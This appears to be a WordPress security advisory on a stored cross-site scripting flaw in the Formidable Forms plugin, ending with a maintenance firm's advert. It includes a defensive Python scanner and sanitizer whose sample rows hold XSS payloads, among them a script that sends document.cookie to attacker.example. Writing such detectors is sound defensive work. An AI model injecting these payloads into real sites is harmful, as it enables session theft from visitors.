Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder Vulnerability – Authenticated (Subscriber+) Stored Cross-Site Scripting – CVE-2024-6725 | WordPress Plugin Vulnerability Report
Plugin Name: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder
Key Information:
- Software Type: Plugin
- Software Slug: formidable
- Software Status: Active
- Software Author: strategy11team
- Software Downloads: 21,415,029
- Active Installs: 400,000
- Last Updated: August 6, 2024
- Patched Versions: 6.11.2
- Affected Versions: <= 6.11.1
Vulnerability Details:
- Name: Formidable Forms <= 6.11.1
- Type: Authenticated (Subscriber+) Stored Cross-Site Scripting
- CVE: CVE-2024-6725
- CVSS Score: 4.9
- Publicly Published: July 30, 2024
- Researcher: zer0gh0st
- Description: The Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘html’ parameter in all versions up to, and including, 6.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Subscriber-level access or higher who hold form editing permissions to inject arbitrary web scripts into pages; the injected script executes whenever a user views an affected page.
Summary:
The Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder for WordPress has a vulnerability in versions up to and including 6.11.1 that allows authenticated (Subscriber+) stored cross-site scripting. This vulnerability has been patched in version 6.11.2.
Detailed Overview:
The Formidable Forms plugin, widely used for creating contact forms, surveys, quizzes, payment forms, calculators, and custom forms on WordPress sites, was found to have a stored cross-site scripting vulnerability. Discovered by the researcher zer0gh0st, the flaw is due to insufficient input sanitization and output escaping of the 'html' parameter: markup submitted there is stored and later rendered without being reduced to a safe subset. The precondition is form editing permission; the account's WordPress role can be as low as Subscriber if that role has been granted it. A user with that permission can store script in form content, and the script runs in the browser of every visitor who views a page on which the form is rendered, including administrators, which can lead to session theft, unauthorized actions performed with the victim's privileges, and data exposure.
The vulnerability, identified as CVE-2024-6725, has a CVSS score of 4.9, a medium severity rating that reflects the authentication and permission requirements. It was publicly disclosed on July 30, 2024, and affects all plugin versions up to and including 6.11.1. The developers addressed the issue in version 6.11.2; the plugin listing was last updated on August 6, 2024.
Advice for Users:
- Immediate Action: Users are strongly encouraged to update to version 6.11.2 immediately to mitigate the risk of exploitation.
- Check for Signs of Compromise: Review stored form content, especially HTML fields, for script tags, event-handler attributes (onerror, onload) or javascript: links that no legitimate editor added, and audit which users and roles currently hold form editing permission.
- Alternate Plugins: While a patch is available, users might still consider exploring alternative plugins that offer similar functionality as an extra precaution.
- Stay Updated: Regularly updating all plugins to their latest versions is crucial to prevent vulnerabilities.
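The two practical points above, that stored form HTML needs to be reduced to a safe subset before it is rendered and that existing stored content should be checked for injected script, are illustrated by the following added example. It is not code from the Formidable Forms plugin; the sample rows are constructed to resemble exported field records, the (form id, field key, stored HTML) layout is an assumption, and the allowlist sanitizer mirrors the idea behind WordPress's `wp_kses_post` rather than its exact tag list.

```python
"""Scan stored form HTML for script-injection markers and show what an
allowlist sanitizer would have kept. Added illustration, not plugin code."""
import html
import re
from html.parser import HTMLParser

# Constructed sample rows: (form_id, field_key, stored_html). Assumed layout.
SAMPLE_ROWS = [
    (12, "intro_html", "<p>Tell us about <strong>your project</strong>.</p>"),
    (12, "legal_html", "<p>Terms</p><script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
    (15, "banner_html", '<img src=x onerror="alert(document.domain)">'),
    (15, "link_html", '<a href="javascript:alert(1)">Continue</a>'),
    (18, "hint_html", '<div class="note">Optional: upload a logo</div>'),
]

# Cheap triage regexes over the raw stored string; a hit means "look at this",
# not proof of exploitation.
PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\son[a-z]+\s*=", re.I),
    "javascript-url": re.compile(r"(?:href|src|action|formaction)\s*=\s*['\"]?\s*javascript:", re.I),
    "active-embed": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
}


def find_markers(fragment):
    """Sorted names of every pattern that matches the fragment."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(fragment))


def scan_rows(rows):
    """Flag every row whose stored HTML carries at least one marker."""
    findings = []
    for form_id, field_key, stored_html in rows:
        markers = find_markers(stored_html)
        if markers:
            findings.append({"form_id": form_id, "field": field_key, "markers": markers})
    return findings


# Allowlist for the sanitizer (an assumption, kept deliberately small).
ALLOWED_TAGS = {"p", "strong", "em", "a", "div", "span", "img", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}, "div": {"class"}, "span": {"class"}}
# Only relative URLs, fragments, http(s) and mailto survive; every other scheme
# (javascript:, data:, vbscript:) is dropped. HTMLParser decodes entities in
# attribute values first, so "javascript&colon;" arrives as "javascript:".
SAFE_URL = re.compile(r"^(?:https?:|mailto:|/|#|[^:]*$)", re.I)
RAW_TEXT_TAGS = {"script", "style"}  # dropped together with their contents


class AllowlistSanitizer(HTMLParser):
    """Rebuild HTML keeping only allowlisted tags and attributes; text is escaped."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: text arrives decoded
        self.out = []
        self.raw_depth = 0  # >0 while inside script/style content

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.raw_depth += 1
            return
        if self.raw_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: strip the tag, keep its (escaped) inner text
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # onerror, onclick, style, ... never make it through
            if name in ("href", "src") and not SAFE_URL.match(value.strip()):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # void tags: emit once, no end tag

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.raw_depth = max(0, self.raw_depth - 1)
            return
        if self.raw_depth or tag not in ALLOWED_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.raw_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    """Return the allowlisted form of a stored HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(f"form {finding['form_id']} field {finding['field']}: {finding['markers']}")
    for _, key, stored in SAMPLE_ROWS:
        print(f"{key}: {sanitize(stored)!r}")
```

Run against a real export, `scan_rows` is the triage pass (three of the five constructed rows are flagged: a script tag, an onerror handler and a javascript: link), and `sanitize` shows what allowlist output escaping would have left of each: the script tag disappears with its body, the image keeps `src` but loses `onerror`, and the link keeps its text but loses the `javascript:` href. Regex triage has false negatives (encoded or split payloads), so treat a clean scan as a reason to patch and review permissions, not as proof of a clean site.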
Conclusion:
The swift response from the Formidable Forms development team to patch this vulnerability underscores the importance of timely updates. Users are advised to ensure that they are running version 6.11.2 or later to secure their WordPress installations.
Detailed Report:
Keeping your website secure is an ongoing challenge that requires vigilance and regular maintenance. One of the most effective ways to protect your site from potential threats is to ensure all your plugins and software are up to date. Recently, a medium-severity vulnerability was disclosed in the Formidable Forms plugin, a widely used tool for creating contact forms, surveys, quizzes, payment forms, calculators, and custom forms on WordPress sites. This vulnerability, tracked as CVE-2024-6725, exposes your site to stored cross-site scripting: a low-privileged authenticated user who holds form editing permission can inject script that then runs for everyone who views the affected pages.
Risks and Potential Impacts
The vulnerability allows authenticated users with at least Subscriber-level access and form editing permissions to inject malicious web scripts into pages. These scripts execute whenever the compromised pages are accessed, potentially leading to unauthorized actions and data breaches. This can result in significant security risks, including:
- Unauthorized access to sensitive data
- Defacement of web pages
- Redirection to malicious websites
- Loss of user trust and damage to your business's reputation
Overview of Previous Vulnerabilities
Since January 26, 2016, there have been 18 previous vulnerabilities reported in the Formidable Forms plugin. This history highlights the importance of staying vigilant and ensuring that your plugins are consistently updated to the latest secure versions.
Conclusion
For small business owners, maintaining website security might seem overwhelming, but staying informed and proactive is key. Consider leveraging professional services to manage your website’s security, allowing you to focus on your core business activities. Regular maintenance, including updates and vulnerability checks, is essential in safeguarding your site against potential threats.
Staying Secure
Staying on top of WordPress security can feel overwhelming for small business owners without dedicated IT staff. At Your WP Guy, we exist to shoulder that burden for you. Our WordPress experts can fully audit, secure, maintain and support your site - so you can focus on growing your business with peace of mind.
Don't tackle security risks alone. Let us help you assess any impact from this vulnerability, update your plugins, and implement ongoing maintenance to avoid future threats. We treat your website like it's our own - because we know how critical it is for reaching your customers.
Get in touch for a free consultation today on making WordPress security stress-free. Call 678-995-5169 or book a call here. Our knowledgeable team is ready to help you safeguard your online presence.